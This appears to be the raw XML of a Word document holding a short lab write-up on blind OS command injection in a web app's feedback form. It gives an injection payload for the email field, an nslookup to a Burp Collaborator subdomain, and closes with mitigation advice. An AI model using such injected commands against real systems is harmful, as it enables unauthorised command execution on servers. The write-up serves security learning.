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6D22001B" w14:textId="6156E1BA" w:rsidR="004602F1" w:rsidRPr="002D7CF4" w:rsidRDefault="00177611" w:rsidP="002D7CF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00177611">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The feedback functionality of the application seems to have a blind OS command injection flaw. Even though the output doesn't reflect in the response, it might be possible to trigger interactions with external domains. The goal is to perform a DNS lookup to a domain under our control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184E32A" w14:textId="7142610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25CC4D11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A973B54" w14:textId="57D502FB" w:rsidR="004419DD" w:rsidRPr="004419DD" w:rsidRDefault="004419DD" w:rsidP="00441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19DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Capture the feedback submission request via Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CBC7E6" w14:textId="6F0F41F9" w:rsidR="004419DD" w:rsidRPr="004419DD" w:rsidRDefault="004419DD" w:rsidP="00441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19DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Modify the email parameter to integrate our payload which calls out to our external domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41477855" w14:textId="10C1F507" w:rsidR="004602F1" w:rsidRPr="004419DD" w:rsidRDefault="004419DD" w:rsidP="00441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19DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Monitor interactions with our domain to validate if the exploit was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A705CDF" w14:textId="779290BD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E46790E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099CBAE6" w:rsidR="00154E92" w:rsidRPr="00154E92" w:rsidRDefault="004419DD" w:rsidP="00154E92">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004419DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>For the email parameter: x||</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004419DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nslookup+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004419DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>x.BURP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004419DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>-COLLABORATOR-SUBDOMAIN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004419DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160CD52F" w14:textId="5CBAB589" w:rsidR="00190CC4" w:rsidRDefault="004419DD" w:rsidP="004419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789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2121C8A" wp14:editId="1BCF1035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4673600" cy="3503930"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="10326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199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3CCE8CC0" w14:textId="5E39F9C4" w:rsidR="004C7899" w:rsidRDefault="00826F34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789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3D7164C1" wp14:editId="4C98BF71">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>942975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4788556" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="21386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406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77" cy="30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D7A51" w14:textId="0038732A" w:rsidR="004602F1" w:rsidRDefault="004602F1" w:rsidP="00826F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320CB9D4" w14:textId="77777777" w:rsidR="002A7054" w:rsidRP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7054">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Strictly validate and sanitize all inputs before processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D41C146" w14:textId="77777777" w:rsidR="002A7054" w:rsidRP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7054">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Limit system-level access and privileges of application processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395F704" w14:textId="512C8450" w:rsidR="004602F1" w:rsidRPr="008267A9" w:rsidRDefault="002A7054" w:rsidP="00355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67A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Regularly review code and features to detect and rectify such vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004602F1" w:rsidRPr="008267A9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F51F2"/>
    <w:rsid w:val="00154E92"/>
    <w:rsid w:val="00171562"/>
    <w:rsid w:val="00177611"/>
    <w:rsid w:val="00190CC4"/>
    <w:rsid w:val="001B4B7C"/>
    <w:rsid w:val="001D1DD6"/>
    <w:rsid w:val="002A7054"/>
    <w:rsid w:val="002D7CF4"/>
    <w:rsid w:val="00312673"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="004419DD"/>
    <w:rsid w:val="004602F1"/>
    <w:rsid w:val="004A26EF"/>
    <w:rsid w:val="004C7899"/>
    <w:rsid w:val="007D6747"/>
    <w:rsid w:val="008267A9"/>
    <w:rsid w:val="00826F34"/>
    <w:rsid w:val="00E940C1"/>
    <w:rsid w:val="00FA71E2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2023-10-08T18:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-08T18:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>